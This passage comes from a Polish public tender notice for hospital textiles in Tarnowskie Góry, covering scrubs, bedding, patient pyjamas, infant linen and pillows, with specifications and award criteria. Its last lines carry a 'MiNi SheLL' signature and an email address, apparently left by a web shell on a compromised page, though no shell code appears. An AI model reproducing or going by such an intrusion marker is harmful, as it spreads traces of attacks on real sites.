- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz  
  na spodniach w dowolnie wybranym miejscu - kolor nadruku granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : S  -  XXL   	


.
15 szt
Uwaga: wycięcie w szpic winno zapewnić swobodne przełożenie głowy.


W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:

1. Oferowany asortyment w postaci próbki materiału - Ubrania operacyjne 100% bawełna 
    Próbka tkaniny wielkości 40 x 40 cm o gramaturze 165 - 170 g/m2 , kolor zielony
   
Na próbce musi być umieszczony nadrukowany motyw. Próbka może być z dowolnym napisem jako wzór.

2. Karta techniczna określająca parametry tkaniny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET  NR  4  -  Ubrania operacyjne dla  OAiIT kolor niebieski   100% bawełna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor granat
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala oraz wyraz LEKARZ na górnej kieszonce bluzy oraz motyw nazwy szpitala na spodniach w dowolnie wybranym miejscu - kolor nadruku granatowy 
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : M  -  XXL   	



20 kpl. (w tym 6 kpl. męskich)

2	Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor niebieski
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st.C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala oraz wyraz PIELĘGNIARKA na górnej kieszonce bluzy oraz motyw nazwy szpitala na spodniach w dowolnie wybranym miejscu - kolor nadruku granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : S  -  XXL   	


80 kpl.

Uwaga: wycięcie w szpic winno zapewnić swobodne przełożenie głowy.


W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:

1. Oferowany asortyment w postaci próbki materiału - Ubrania operacyjne 100% bawełna 
    Próbka tkaniny wielkości 40 x 40 cm o gramaturze 165 - 170 g/m2 , kolor niebieski
   
Na próbce musi być umieszczony nadrukowany motyw. Próbka może być z dowolnym napisem jako wzór.

2. Karta techniczna określająca parametry tkaniny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET  NR 5 - Bielizna pościelowa dla sal operacyjnych i zabiegowych  100% bawełna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Prześcieradło - kolor niebieski
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wymiar 180 x 220 cm
- gramatura 170-175 g/m2
- temp. prania  95 st.C
- LOGO SZPITALA WTKANE - kolor logo granatowy
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY
   
Wykonane w dwóch miejscach z każdej strony wg załączonego wzoru	


        100 szt

.
2	Podkład - kolor niebieski
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wymiar 90 x 150 cm
- gramatura 170-175 g/m2
- temp. prania  95 st.C
- LOGO SZPITALA WTKANE - kolor granatowy
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY
   
Wykonane w dwóch miejscach z każdej strony wg załączonego wzoru	

100 szt

W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:

1. Oferowany asortyment w postaci próbki materiału  Bielizna pościelowa zielona100% bawełna 
    Próbka tkaniny wielkości 40 x 40 cm o gramaturze 170 - 175 g/m2 , biała.

Na próbce musi być umieszczone logo wykonane metodą wymaganą w SIWZ (wtkane). Próbka może być z dowolnym napisem jako wzór.
2. Karta techniczna określająca parametry tkanin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET  NR 6 - Piżamy  dla  pacjentów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Piżama męska -bluza 
-bluza rozpinana, na guziki, rękaw 3/4,  dwie kieszenie 

- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wzrost 182 cm, 176 cm, 164 cm 
- temp. prania  95 st.C
- LOGO SZPITALA nadruk - 
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY   
	
182 cm-25 szt

176 cm- 35 szt

164cm-20 szt

        

.
2	Piżama męska- spodnie na gumce , rozporek
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wzrost 182 cm, 176 cm, 164 cm 
- temp. prania  95 st.C
- LOGO SZPITALA nadruk - 
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY   
	182 cm- 20szt

176 cm- 35 szt 

164cm-25 szt 

       

3	
Koszula nocna damska
rozpinana po szyją, rękaw 3/4
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wzrost 176 cm, 164 cm, 158 cm 
- temp. prania  95 st.C
- LOGO SZPITALA nadruk - 
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY
   	
176 cm-10 szt 

164 cm-30 szt 

158 cm-10 szt
3	Piżama dziecięca
-bluza nierozpinana , rękaw  długi, 
 -spodnie na gumce,
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wzrost 120cm, 140cm, 160cm
- temp. prania  95 st.C
- LOGO SZPITALA nadruk - 
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY
   
	
110cm - 10 szt

128 cm-10 szt 

W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:

1. Karta techniczna określająca parametry produktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET  NR  7  - Bielizna  noworodkowa i niemowlęca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Poszewka na kocyk kolorowa 

- wymiar 80cmx80cm
- tkanina flanela sanforyzowana, nici 100% bawełna, 
- bez guzików
- temp. prania  95 st.C
LOGO SZPITALA nadruk  - KOLOR DOWOLNY
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA TARNOWSKIE GÓRY   
	


        100 szt

.
2	Kocyk do poszewek

- wymiar 80cmx80cm
- tkanina bawełna  sanforyzowana, nici 100% bawełna
- temp. prania  90 st.C
LOGO SZPITALA nadruk  - KOLOR DOWOLNY
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY   
	

10 szt

3	Pieluchy tetrowe  
wymiar 80cmx80cm, 
100% bawełna ,białe
pranie w temp 95 st
	1500 szt
5	Kaftaniki niemowlęce wiązane 
100% bawełna, białe 
	96 cm -10szt
62-64 cm - 200szt

6	Śpiochy niemowlęce 
100% bawełna, kolorowe w rozmiarach  86cm, 94cm	
96 cm -10 szt

W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:

1. Karta techniczna określająca parametry produktu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET  NR  8 - poduszki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Poduszka 
- tkanina 50% bawełna, 50% poliester sanforyzowana, nici 50% bawełna, 
- wymiar 50 x 70 cm
- wypełnienie kulki poliestrowe , antyalergiczne
- temp. prania i dezynfekcji  95 st.C
LOGO SZPITALA nadruk  - KOLOR DOWOLNY
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY   	


      100 szt

.
2	Poduszka 
- tkanina 50% bawełna, 50% poliester sanforyzowana, nici 50% bawełna, 
- wymiar 50 x 60 cm
- wypełnienie kulki poliestrowe , antyalergiczne
- temp. prania i dezynfekcji  95 st.C
LOGO SZPITALA nadruk  - KOLOR DOWOLNY
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY   	

100 szt

W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:
1. Karta techniczna określająca parametry produktu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com